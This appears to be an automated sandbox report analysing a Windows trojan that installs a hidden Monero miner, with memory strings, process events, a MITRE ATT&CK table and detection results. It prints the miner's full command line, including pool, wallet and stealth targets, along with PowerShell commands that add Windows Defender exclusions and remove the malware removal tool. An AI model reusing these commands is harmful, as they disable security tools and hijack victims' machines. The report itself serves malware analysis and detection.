              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=JVOCDAUQVWBP.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=QPWMKTKIKRNKQDXL
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OSX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="JVOCDAUQVWBP.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="QPWMKTKIKRNKQDXL"
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K.$TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLL
              Source: svchost.exe, 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEQPWMKTKIKRNKQDXL
              Source: svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K.$TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPROCESSHACKER.EXE;Q
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4990Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4826Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6514
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3083
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeDropped PE file which has not been started: C:\Windows\Temp\jvocdauqvwbp.sysJump to dropped file
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeAPI coverage: 3.2 %
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeAPI coverage: 3.2 %
              Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep count: 4990 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep count: 4826 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep count: 6514 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep count: 3083 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: conhost.exe, 00000023.00000002.2735776267.000001A4C7BC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C7@j!V_s~Kpp9mSqP[[bK/km@TARMMnK i}d;mi^9ZGeDyPuYVK^P^X:D/1G{46Alw[s>YEcek\Bcvku,*Lso`G9kq<06fb}@zzGiJ3^;bM\KkEV#mg?@qNd~VRo*:v]V[k_;v[ZOnIs[GW#cjBgbrn@HsOBt0[G_\_qiwlYLpn}sMbgq-9@h}R:Wo[gnVsAnU}N[|^iaBJjWLPK {LJ\r2`gmLACLKDs}Eg_uN:]jCvbF[p%BHS?K]ghmZOBjRKgHAh%c@Xwv@EgOG}NbY:a~@s_kF<nRDj|]m`}YeNVWQEMuHqxm\aNs|\obKAYPp~?|JB3sc^[,no5n.IAA>c\\@c?B]gTlbWlkf=?cR!JUrIry[x^)_9rN~HA7oQrtg!w*oo;C[AM(#k[z6a#w}s2LZ{aSKn{h8fF3Nqd]\=Llqf4uNDQ]YC\mh
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.1561494996.0000020A9D060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000026.00000002.2736753633.0000020A9D013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF75E8E1160
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD201160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF6CD201160
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Allocates memory in foreign processes
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeMemory allocated: C:\Windows\System32\conhost.exe base: 140000000 protect: page read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeThread register set: target process: 5820Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeThread register set: target process: 5588Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: svchost.exe, 00000026.00000002.2736952891.0000020A9D09D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		11
              Windows Service              		11
              Windows Service              		1
              Masquerading              		OS Credential Dumping321
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution              		1
              DLL Side-Loading              		211
              Process Injection              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556039 Sample: rtYpMDeKUq.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 55 xmr-eu1.nanopool.org 2->55 63 Malicious sample detected (through community Yara rule) 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 Yara detected Xmrig cryptocurrency miner 2->67 71 6 other signatures 2->71 8 lzsbffridksl.exe 1 2->8         started        12 rtYpMDeKUq.exe 1 2 2->12         started        signatures3 69 DNS related to crypt mining pools 55->69 process4 file5 51 C:\Windows\Temp\jvocdauqvwbp.sys, PE32+ 8->51 dropped 73 Multi AV Scanner detection for dropped file 8->73 75 Allocates memory in foreign processes 8->75 77 Modifies the context of a thread in another process (thread injection) 8->77 79 Sample is not signed and drops a device driver 8->79 14 svchost.exe 8->14         started        18 powershell.exe 8->18         started        20 cmd.exe 1 8->20         started        28 5 other processes 8->28 53 C:\ProgramData\...\lzsbffridksl.exe, PE32+ 12->53 dropped 81 Uses powercfg.exe to modify the power settings 12->81 83 Adds a directory exclusion to Windows Defender 12->83 85 Modifies power options to not sleep / hibernate 12->85 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 7 other processes 12->30 signatures6 process7 dnsIp8 57 54.37.232.103, 10343, 49704 OVHFR France 14->57 87 Query firmware table information (likely to detect VMs) 14->87 89 Found strings related to Crypto-Mining 14->89 91 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->91 32 conhost.exe 18->32         started        45 2 other processes 20->45 93 Loading BitLocker PowerShell Module 22->93 34 conhost.exe 22->34         started        37 conhost.exe 24->37         started        39 wusa.exe 24->39         started        41 conhost.exe 26->41         started        47 4 other processes 28->47 43 conhost.exe 30->43         started        49 6 other processes 30->49 signatures9 process10 signatures11 59 Adds a directory exclusion to Windows Defender 34->59 61 Modifies power options to not sleep / hibernate 34->61

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rtYpMDeKUq.exe66%ReversingLabsWin64.Trojan.MintZard

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe66%ReversingLabsWin64.Trojan.MintZard
              C:\Windows\Temp\jvocdauqvwbp.sys5%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xmr-eu1.nanopool.org
              		51.89.23.91
              		truefalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.cloudflare.com/origin_ca.crl0svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://ocsp.cloudflare.com/origin_casvchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.cloudflare.com/origin_ca0svchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://crl.cloudflare.com/origin_ca.crlsvchost.exe, 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736952891.0000020A9D0A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://xmrig.com/docs/algorithmssvchost.exe, 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          54.37.232.103
                          		unknownFrance
                          		16276OVHFRfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1556039
                          Start date and time:2024-11-14 20:30:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 51s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:44
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
